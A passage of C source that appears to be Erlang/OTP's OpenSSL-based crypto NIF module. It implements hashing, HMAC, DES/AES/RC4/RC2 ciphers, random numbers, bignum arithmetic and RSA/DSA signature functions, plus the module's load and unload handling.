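 * defined as H((K' ^ opad) || H((K' ^ ipad) || m)), with K' the key brought
 * to the hash block size (HMAC_INT_LEN, 64 bytes for MD5 and SHA-1); the
 * hmac_md5()/hmac_sha1() helpers declared above follow this construction. */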
static ErlNifRWLock** lock_vec = NULL; /* Static locks used by openssl */
static ERL_NIF_TERM atom_true;
static ERL_NIF_TERM atom_false;
static ERL_NIF_TERM atom_sha;
static ERL_NIF_TERM atom_md5;
static ERL_NIF_TERM atom_error;
static ERL_NIF_TERM atom_rsa_pkcs1_padding;
static ERL_NIF_TERM atom_rsa_pkcs1_oaep_padding;
static ERL_NIF_TERM atom_rsa_no_padding;
static ERL_NIF_TERM atom_undefined;
static ERL_NIF_TERM atom_ok;
static ERL_NIF_TERM atom_not_prime;
static ERL_NIF_TERM atom_not_strong_prime;
static ERL_NIF_TERM atom_unable_to_check_generator;
static ERL_NIF_TERM atom_not_suitable_generator;
static ERL_NIF_TERM atom_check_failed;
static ERL_NIF_TERM atom_unknown;
static ERL_NIF_TERM atom_none;
static int is_ok_load_info(ErlNifEnv* env, ERL_NIF_TERM load_info)
{
int i;
return enif_get_int(env,load_info,&i) && i == 101;
}
static void* crypto_alloc(size_t size)
{
return enif_alloc(size);
}
static void* crypto_realloc(void* ptr, size_t size)
{
return enif_realloc(ptr, size);
}
static void crypto_free(void* ptr)
{
enif_free(ptr);
}
static int load(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info)
{
ErlNifSysInfo sys_info;
CRYPTO_set_mem_functions(crypto_alloc, crypto_realloc, crypto_free);
if (!is_ok_load_info(env, load_info)) {
return -1;
}
#ifdef OPENSSL_THREADS
enif_system_info(&sys_info, sizeof(sys_info));
if (sys_info.scheduler_threads > 1) {
int i;
lock_vec = enif_alloc(CRYPTO_num_locks()*sizeof(*lock_vec));
if (lock_vec==NULL) return -1;
memset(lock_vec,0,CRYPTO_num_locks()*sizeof(*lock_vec));
for (i=CRYPTO_num_locks()-1; i>=0; --i) {
lock_vec[i] = enif_rwlock_create("crypto_stat");
if (lock_vec[i]==NULL) return -1;
}
CRYPTO_set_locking_callback(locking_function);
CRYPTO_set_id_callback(id_function);
CRYPTO_set_dynlock_create_callback(dyn_create_function);
CRYPTO_set_dynlock_lock_callback(dyn_lock_function);
CRYPTO_set_dynlock_destroy_callback(dyn_destroy_function);
}
/* else no need for locks */
#endif /* OPENSSL_THREADS */
atom_true = enif_make_atom(env,"true");
atom_false = enif_make_atom(env,"false");
atom_sha = enif_make_atom(env,"sha");
atom_md5 = enif_make_atom(env,"md5");
atom_error = enif_make_atom(env,"error");
atom_rsa_pkcs1_padding = enif_make_atom(env,"rsa_pkcs1_padding");
atom_rsa_pkcs1_oaep_padding = enif_make_atom(env,"rsa_pkcs1_oaep_padding");
atom_rsa_no_padding = enif_make_atom(env,"rsa_no_padding");
atom_undefined = enif_make_atom(env,"undefined");
atom_ok = enif_make_atom(env,"ok");
atom_not_prime = enif_make_atom(env,"not_prime");
atom_not_strong_prime = enif_make_atom(env,"not_strong_prime");
atom_unable_to_check_generator = enif_make_atom(env,"unable_to_check_generator");
atom_not_suitable_generator = enif_make_atom(env,"not_suitable_generator");
atom_check_failed = enif_make_atom(env,"check_failed");
atom_unknown = enif_make_atom(env,"unknown");
atom_none = enif_make_atom(env,"none");
*priv_data = NULL;
library_refc++;
return 0;
}
static int reload(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info)
{
if (*priv_data != NULL) {
return -1; /* Don't know how to do that */
}
if (library_refc == 0) {
/* No support for real library upgrade. The tricky thing is to know
when to (re)set the callbacks for allocation and locking. */
return -2;
}
if (!is_ok_load_info(env, load_info)) {
return -1;
}
return 0;
}
static int upgrade(ErlNifEnv* env, void** priv_data, void** old_priv_data,
ERL_NIF_TERM load_info)
{
int i;
if (*old_priv_data != NULL) {
return -1; /* Don't know how to do that */
}
i = reload(env,priv_data,load_info);
if (i != 0) {
return i;
}
library_refc++;
return 0;
}
static void unload(ErlNifEnv* env, void* priv_data)
{
if (--library_refc <= 0) {
CRYPTO_cleanup_all_ex_data();
if (lock_vec != NULL) {
int i;
for (i=CRYPTO_num_locks()-1; i>=0; --i) {
if (lock_vec[i] != NULL) {
enif_rwlock_destroy(lock_vec[i]);
}
}
enif_free(lock_vec);
}
}
/*else NIF library still used by other (new) module code */
}
static ERL_NIF_TERM info_lib(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{
/* [{<<"OpenSSL">>,9470143,<<"OpenSSL 0.9.8k 25 Mar 2009">>}] */
static const char libname[] = "OpenSSL";
unsigned name_sz = strlen(libname);
const char* ver = SSLeay_version(SSLEAY_VERSION);
unsigned ver_sz = strlen(ver);
ERL_NIF_TERM name_term, ver_term;
memcpy(enif_make_new_binary(env, name_sz, &name_term), libname, name_sz);
memcpy(enif_make_new_binary(env, ver_sz, &ver_term), ver, ver_sz);
return enif_make_list1(env, enif_make_tuple3(env, name_term,
enif_make_int(env, SSLeay()),
ver_term));
}
static ERL_NIF_TERM md5(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
MD5((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,MD5_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md5_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
MD5_Init((MD5_CTX *) enif_make_new_binary(env, MD5_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md5_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
MD5_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin)
|| ctx_bin.size != MD5_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (MD5_CTX*) enif_make_new_binary(env,MD5_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, MD5_CTX_LEN);
MD5_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM md5_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
MD5_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD5_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, MD5_CTX_LEN); /* writable */
MD5_Final(enif_make_new_binary(env, MD5_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM sha(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
SHA1((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,SHA_LEN, &ret));
return ret;
}
static ERL_NIF_TERM sha_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
SHA1_Init((SHA_CTX *) enif_make_new_binary(env, SHA_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM sha_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
SHA_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != SHA_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (SHA_CTX*) enif_make_new_binary(env,SHA_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, SHA_CTX_LEN);
SHA1_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM sha_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
SHA_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != SHA_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, SHA_CTX_LEN); /* writable */
SHA1_Final(enif_make_new_binary(env, SHA_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM md4(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data) */
ErlNifBinary ibin;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &ibin)) {
return enif_make_badarg(env);
}
MD4((unsigned char *) ibin.data, ibin.size,
enif_make_new_binary(env,MD4_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md4_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* () */
ERL_NIF_TERM ret;
MD4_Init((MD4_CTX *) enif_make_new_binary(env, MD4_CTX_LEN, &ret));
return ret;
}
static ERL_NIF_TERM md4_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context, Data) */
MD4_CTX* new_ctx;
ErlNifBinary ctx_bin, data_bin;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD4_CTX_LEN
|| !enif_inspect_iolist_as_binary(env, argv[1], &data_bin)) {
return enif_make_badarg(env);
}
new_ctx = (MD4_CTX*) enif_make_new_binary(env,MD4_CTX_LEN, &ret);
memcpy(new_ctx, ctx_bin.data, MD4_CTX_LEN);
MD4_Update(new_ctx, data_bin.data, data_bin.size);
return ret;
}
static ERL_NIF_TERM md4_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Context) */
ErlNifBinary ctx_bin;
MD4_CTX ctx_clone;
ERL_NIF_TERM ret;
if (!enif_inspect_binary(env, argv[0], &ctx_bin) || ctx_bin.size != MD4_CTX_LEN) {
return enif_make_badarg(env);
}
memcpy(&ctx_clone, ctx_bin.data, MD4_CTX_LEN); /* writable */
MD4_Final(enif_make_new_binary(env, MD4_LEN, &ret), &ctx_clone);
return ret;
}
static ERL_NIF_TERM md5_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, MacSize) */
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ErlNifBinary key, data;
unsigned mac_sz;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data)
|| !enif_get_uint(env,argv[2],&mac_sz) || mac_sz > MD5_LEN) {
return enif_make_badarg(env);
}
hmac_md5(key.data, key.size, data.data, data.size, hmacbuf);
memcpy(enif_make_new_binary(env, mac_sz, &ret), hmacbuf, mac_sz);
return ret;
}
static ERL_NIF_TERM sha_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data, MacSize) */
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ErlNifBinary key, data;
unsigned mac_sz;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| !enif_inspect_iolist_as_binary(env, argv[1], &data)
|| !enif_get_uint(env,argv[2],&mac_sz) || mac_sz > SHA_LEN) {
return enif_make_badarg(env);
}
hmac_sha1(key.data, key.size, data.data, data.size, hmacbuf);
memcpy(enif_make_new_binary(env, mac_sz, &ret),
hmacbuf, mac_sz);
return ret;
}
static ERL_NIF_TERM des_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Ivec, Text, IsEncrypt) */
ErlNifBinary key, ivec, text;
DES_key_schedule schedule;
DES_cblock ivec_clone; /* writable copy */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 8
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)
|| text.size % 8 != 0) {
return enif_make_badarg(env);
}
memcpy(&ivec_clone, ivec.data, 8);
DES_set_key((const_DES_cblock*)key.data, &schedule);
DES_ncbc_encrypt(text.data, enif_make_new_binary(env, text.size, &ret),
text.size, &schedule, &ivec_clone, (argv[3] == atom_true));
return ret;
}
static ERL_NIF_TERM des_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Text/Cipher, IsEncrypt) */
ErlNifBinary key, text;
DES_key_schedule schedule;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 8 ||
!enif_inspect_iolist_as_binary(env, argv[1], &text) || text.size != 8) {
return enif_make_badarg(env);
}
DES_set_key((const_DES_cblock*)key.data, &schedule);
DES_ecb_encrypt((const_DES_cblock*)text.data,
(DES_cblock*)enif_make_new_binary(env, 8, &ret),
&schedule, (argv[2] == atom_true));
return ret;
}
static ERL_NIF_TERM des_ede3_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key1, Key2, Key3, IVec, Text/Cipher, IsEncrypt) */
ErlNifBinary key1, key2, key3, ivec, text;
DES_key_schedule schedule1, schedule2, schedule3;
DES_cblock ivec_clone; /* writable copy */
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key1) || key1.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[1], &key2) || key2.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &key3) || key3.size != 8
|| !enif_inspect_binary(env, argv[3], &ivec) || ivec.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[4], &text)
|| text.size % 8 != 0) {
return enif_make_badarg(env);
}
memcpy(&ivec_clone, ivec.data, 8);
DES_set_key((const_DES_cblock*)key1.data, &schedule1);
DES_set_key((const_DES_cblock*)key2.data, &schedule2);
DES_set_key((const_DES_cblock*)key3.data, &schedule3);
DES_ede3_cbc_encrypt(text.data, enif_make_new_binary(env,text.size,&ret),
text.size, &schedule1, &schedule2, &schedule3,
&ivec_clone, (argv[5] == atom_true));
return ret;
}
static ERL_NIF_TERM aes_cfb_128_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data, IsEncrypt) */
ErlNifBinary key, ivec, text;
AES_KEY aes_key;
unsigned char ivec_clone[16]; /* writable copy */
int new_ivlen = 0;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key) || key.size != 16
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)
|| text.size % 16 != 0) {
return enif_make_badarg(env);
}
memcpy(ivec_clone, ivec.data, 16);
AES_set_encrypt_key(key.data, 128, &aes_key);
AES_cfb128_encrypt((unsigned char *) text.data,
enif_make_new_binary(env, text.size, &ret),
text.size, &aes_key, ivec_clone, &new_ivlen,
(argv[3] == atom_true));
return ret;
}
/* Common for both encrypt and decrypt
*/
static ERL_NIF_TERM aes_ctr_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data) */
ErlNifBinary key, ivec, text;
AES_KEY aes_key;
unsigned char ivec_clone[16]; /* writable copy */
unsigned char ecount_buf[AES_BLOCK_SIZE];
unsigned int num = 0;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key)
|| AES_set_encrypt_key(key.data, key.size*8, &aes_key) != 0
|| !enif_inspect_binary(env, argv[1], &ivec) || ivec.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &text)) {
return enif_make_badarg(env);
}
memcpy(ivec_clone, ivec.data, 16);
memset(ecount_buf, 0, sizeof(ecount_buf));
AES_ctr128_encrypt((unsigned char *) text.data,
enif_make_new_binary(env, text.size, &ret),
text.size, &aes_key, ivec_clone, ecount_buf, &num);
    /* To do an incremental {en|de}cryption, the state to keep between calls
       must include ivec_clone, ecount_buf and num. */
return ret;
}
static ERL_NIF_TERM rand_bytes_1(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Bytes) */
unsigned bytes;
unsigned char* data;
ERL_NIF_TERM ret;
if (!enif_get_uint(env, argv[0], &bytes)) {
return enif_make_badarg(env);
}
data = enif_make_new_binary(env, bytes, &ret);
RAND_pseudo_bytes(data, bytes);
ERL_VALGRIND_MAKE_MEM_DEFINED(data, bytes);
return ret;
}
static ERL_NIF_TERM rand_bytes_3(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Bytes, TopMask, BottomMask) */
unsigned bytes;
unsigned char* data;
unsigned top_mask, bot_mask;
ERL_NIF_TERM ret;
if (!enif_get_uint(env, argv[0], &bytes)
|| !enif_get_uint(env, argv[1], &top_mask)
|| !enif_get_uint(env, argv[2], &bot_mask)) {
return enif_make_badarg(env);
}
data = enif_make_new_binary(env, bytes, &ret);
RAND_pseudo_bytes(data, bytes);
ERL_VALGRIND_MAKE_MEM_DEFINED(data, bytes);
if (bytes > 0) {
data[bytes-1] |= top_mask;
data[0] |= bot_mask;
}
return ret;
}
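/* The "mpint" helpers below use the multi-precision integer encoding that
 * the Erlang side passes in: a 4-byte big-endian length header followed by
 * that many bytes of big-endian magnitude.  get_bn_from_mpint() strips the
 * header and hands the payload to BN_bin2bn(), while inspect_mpint() only
 * checks that the header is consistent with the binary's size. */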
static int get_bn_from_mpint(ErlNifEnv* env, ERL_NIF_TERM term, BIGNUM** bnp)
{
ErlNifBinary bin;
int sz;
if (!enif_inspect_binary(env,term,&bin)) {
return 0;
}
ERL_VALGRIND_ASSERT_MEM_DEFINED(bin.data, bin.size);
sz = bin.size - 4;
if (sz < 0 || get_int32(bin.data) != sz) {
return 0;
}
*bnp = BN_bin2bn(bin.data+4, sz, NULL);
return 1;
}
static ERL_NIF_TERM rand_uniform_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Lo,Hi) */
BIGNUM *bn_from = NULL, *bn_to, *bn_rand;
unsigned char* data;
unsigned dlen;
ERL_NIF_TERM ret;
if (!get_bn_from_mpint(env, argv[0], &bn_from)
|| !get_bn_from_mpint(env, argv[1], &bn_rand)) {
if (bn_from) BN_free(bn_from);
return enif_make_badarg(env);
}
bn_to = BN_new();
BN_sub(bn_to, bn_rand, bn_from);
BN_pseudo_rand_range(bn_rand, bn_to);
BN_add(bn_rand, bn_rand, bn_from);
dlen = BN_num_bytes(bn_rand);
data = enif_make_new_binary(env, dlen+4, &ret);
put_int32(data, dlen);
BN_bn2bin(bn_rand, data+4);
ERL_VALGRIND_MAKE_MEM_DEFINED(data+4, dlen);
BN_free(bn_rand);
BN_free(bn_from);
BN_free(bn_to);
return ret;
}
static ERL_NIF_TERM mod_exp_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Base,Exponent,Modulo) */
BIGNUM *bn_base=NULL, *bn_exponent=NULL, *bn_modulo, *bn_result;
BN_CTX *bn_ctx;
unsigned char* ptr;
unsigned dlen;
ERL_NIF_TERM ret;
if (!get_bn_from_mpint(env, argv[0], &bn_base)
|| !get_bn_from_mpint(env, argv[1], &bn_exponent)
|| !get_bn_from_mpint(env, argv[2], &bn_modulo)) {
if (bn_base) BN_free(bn_base);
if (bn_exponent) BN_free(bn_exponent);
return enif_make_badarg(env);
}
bn_result = BN_new();
bn_ctx = BN_CTX_new();
BN_mod_exp(bn_result, bn_base, bn_exponent, bn_modulo, bn_ctx);
dlen = BN_num_bytes(bn_result);
ptr = enif_make_new_binary(env, dlen+4, &ret);
put_int32(ptr, dlen);
BN_bn2bin(bn_result, ptr+4);
BN_free(bn_result);
BN_CTX_free(bn_ctx);
BN_free(bn_modulo);
BN_free(bn_exponent);
BN_free(bn_base);
return ret;
}
static int inspect_mpint(ErlNifEnv* env, ERL_NIF_TERM term, ErlNifBinary* bin)
{
return enif_inspect_binary(env, term, bin) &&
bin->size >= 4 && get_int32(bin->data) == bin->size-4;
}
static ERL_NIF_TERM dss_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (DigestType,Data,Signature,Key=[P, Q, G, Y]) */
ErlNifBinary data_bin, sign_bin;
BIGNUM *dsa_p = NULL, *dsa_q = NULL, *dsa_g = NULL, *dsa_y = NULL;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ERL_NIF_TERM head, tail;
DSA *dsa;
int i;
if (!inspect_mpint(env, argv[2], &sign_bin)
|| !enif_get_list_cell(env, argv[3], &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_p)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_q)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_g)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &dsa_y)
|| !enif_is_empty_list(env,tail)) {
badarg:
if (dsa_p) BN_free(dsa_p);
if (dsa_q) BN_free(dsa_q);
if (dsa_g) BN_free(dsa_g);
if (dsa_y) BN_free(dsa_y);
return enif_make_badarg(env);
}
if (argv[0] == atom_sha && inspect_mpint(env, argv[1], &data_bin)) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
}
else if (argv[0] == atom_none && enif_inspect_binary(env, argv[1], &data_bin)
&& data_bin.size == SHA_DIGEST_LENGTH) {
memcpy(hmacbuf, data_bin.data, SHA_DIGEST_LENGTH);
}
else {
goto badarg;
}
dsa = DSA_new();
dsa->p = dsa_p;
dsa->q = dsa_q;
dsa->g = dsa_g;
dsa->priv_key = NULL;
dsa->pub_key = dsa_y;
i = DSA_verify(0, hmacbuf, SHA_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, dsa);
DSA_free(dsa);
return(i > 0) ? atom_true : atom_false;
}
static ERL_NIF_TERM rsa_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Type, Data, Signature, Key=[E,N]) */
ErlNifBinary data_bin, sign_bin;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
ERL_NIF_TERM head, tail, ret;
int i, is_sha;
RSA* rsa = RSA_new();
if (argv[0] == atom_sha) is_sha = 1;
else if (argv[0] == atom_md5) is_sha = 0;
else goto badarg;
if (!inspect_mpint(env, argv[1], &data_bin)
|| !inspect_mpint(env, argv[2], &sign_bin)
|| !enif_get_list_cell(env, argv[3], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_is_empty_list(env, tail)) {
badarg:
ret = enif_make_badarg(env);
}
else {
if (is_sha) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
i = RSA_verify(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, rsa);
}
else {
MD5(data_bin.data+4, data_bin.size-4, hmacbuf);
i = RSA_verify(NID_md5, hmacbuf, MD5_DIGEST_LENGTH,
sign_bin.data+4, sign_bin.size-4, rsa);
}
ret = (i==1 ? atom_true : atom_false);
}
RSA_free(rsa);
return ret;
}
static ERL_NIF_TERM aes_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, IVec, Data, IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
AES_KEY aes_key;
unsigned char ivec[16];
int i;
unsigned char* ret_ptr;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| (key_bin.size != 16 && key_bin.size != 32)
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 16
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)
|| data_bin.size % 16 != 0) {
return enif_make_badarg(env);
}
if (argv[3] == atom_true) {
i = AES_ENCRYPT;
AES_set_encrypt_key(key_bin.data, key_bin.size*8, &aes_key);
}
else {
i = AES_DECRYPT;
AES_set_decrypt_key(key_bin.data, key_bin.size*8, &aes_key);
}
ret_ptr = enif_make_new_binary(env, data_bin.size, &ret);
memcpy(ivec, ivec_bin.data, 16); /* writable copy */
AES_cbc_encrypt(data_bin.data, ret_ptr, data_bin.size, &aes_key, ivec, i);
return ret;
}
static ERL_NIF_TERM exor(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Data1, Data2) */
ErlNifBinary d1, d2;
unsigned char* ret_ptr;
int i;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &d1)
|| !enif_inspect_iolist_as_binary(env,argv[1], &d2)
|| d1.size != d2.size) {
return enif_make_badarg(env);
}
ret_ptr = enif_make_new_binary(env, d1.size, &ret);
for (i=0; i<d1.size; i++) {
ret_ptr[i] = d1.data[i] ^ d2.data[i];
}
return ret;
}
static ERL_NIF_TERM rc4_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key, Data) */
ErlNifBinary key, data;
RC4_KEY rc4_key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &key)
|| !enif_inspect_iolist_as_binary(env,argv[1], &data)) {
return enif_make_badarg(env);
}
RC4_set_key(&rc4_key, key.size, key.data);
RC4(&rc4_key, data.size, data.data,
enif_make_new_binary(env, data.size, &ret));
return ret;
}
static ERL_NIF_TERM rc4_set_key(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key) */
ErlNifBinary key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env,argv[0], &key)) {
return enif_make_badarg(env);
}
RC4_set_key((RC4_KEY*)enif_make_new_binary(env, sizeof(RC4_KEY), &ret),
key.size, key.data);
return ret;
}
static ERL_NIF_TERM rc4_encrypt_with_state(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (State, Data) */
ErlNifBinary state, data;
RC4_KEY* rc4_key;
ERL_NIF_TERM new_state, new_data;
if (!enif_inspect_iolist_as_binary(env,argv[0], &state)
|| state.size != sizeof(RC4_KEY)
|| !enif_inspect_iolist_as_binary(env,argv[1], &data)) {
return enif_make_badarg(env);
}
rc4_key = (RC4_KEY*)enif_make_new_binary(env, sizeof(RC4_KEY), &new_state);
memcpy(rc4_key, state.data, sizeof(RC4_KEY));
RC4(rc4_key, data.size, data.data,
enif_make_new_binary(env, data.size, &new_data));
return enif_make_tuple2(env,new_state,new_data);
}
static ERL_NIF_TERM rc2_40_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Key,IVec,Data,IsEncrypt) */
ErlNifBinary key_bin, ivec_bin, data_bin;
RC2_KEY rc2_key;
ERL_NIF_TERM ret;
if (!enif_inspect_iolist_as_binary(env, argv[0], &key_bin)
|| key_bin.size != 5
|| !enif_inspect_binary(env, argv[1], &ivec_bin)
|| ivec_bin.size != 8
|| !enif_inspect_iolist_as_binary(env, argv[2], &data_bin)) {
return enif_make_badarg(env);
}
RC2_set_key(&rc2_key, 5, key_bin.data, 40);
RC2_cbc_encrypt(data_bin.data,
enif_make_new_binary(env, data_bin.size, &ret),
data_bin.size, &rc2_key,
ivec_bin.data,
(argv[3] == atom_true));
return ret;
}
static ERL_NIF_TERM rsa_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{/* (Type,Data,Key=[E,N,D]) */
ErlNifBinary data_bin, ret_bin;
ERL_NIF_TERM head, tail;
unsigned char hmacbuf[SHA_DIGEST_LENGTH];
unsigned rsa_s_len;
RSA *rsa = RSA_new();
int i, is_sha;
if (argv[0] == atom_sha) is_sha = 1;
else if (argv[0] == atom_md5) is_sha = 0;
else goto badarg;
if (!inspect_mpint(env,argv[1],&data_bin)
|| !enif_get_list_cell(env, argv[2], &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->e)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->n)
|| !enif_get_list_cell(env, tail, &head, &tail)
|| !get_bn_from_mpint(env, head, &rsa->d)
|| !enif_is_empty_list(env,tail)) {
badarg:
RSA_free(rsa);
return enif_make_badarg(env);
}
enif_alloc_binary(RSA_size(rsa), &ret_bin);
if (is_sha) {
SHA1(data_bin.data+4, data_bin.size-4, hmacbuf);
ERL_VALGRIND_ASSERT_MEM_DEFINED(hmacbuf, SHA_DIGEST_LENGTH);
i = RSA_sign(NID_sha1, hmacbuf, SHA_DIGEST_LENGTH,
ret_bin.data, &rsa_s_len, rsa);
}
else {
MD5(data_bin.data+4, data_bin.size-4, hmacbuf);
ERL_VALGRIND_ASSERT_MEM_DEFINED(hmacbuf, MD5_DIGEST_LENGTH);
i = RSA_sign(NID_md5, hmacbuf,MD5_DIGEST_LENGTH,
ret_bin.data, &rsa_s_len, rsa);
}
RSA_free(rsa);
if (i) {
ERL_VALGRIND_MAKE_MEM_DEFINED(ret_bin.data, rsa_s_len);
if (rsa_s_len != data_bin.size) {
enif_realloc_binary(&ret_bin, rsa_s_len);
ERL_VALGRIND_ASSERT_MEM_DEFINED(ret_bin.data, rsa_s_len);
}
return enif_make_binary(env,&ret_bin);
}
else {
enif_release_binary(&ret_bin);
return atom_error;
}
}
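/* The mpint terms consumed above appear to use an SSH-style encoding: a
 * 4-byte big-endian length header followed by the big-endian magnitude.
 * That is why the digest is computed over data_bin.data+4 for
 * data_bin.size-4 bytes here, and why put_int32() writes a length prefix
 * wherever results are returned in the same shape later in this file. */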
static ERL_NIF_TERM dss_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
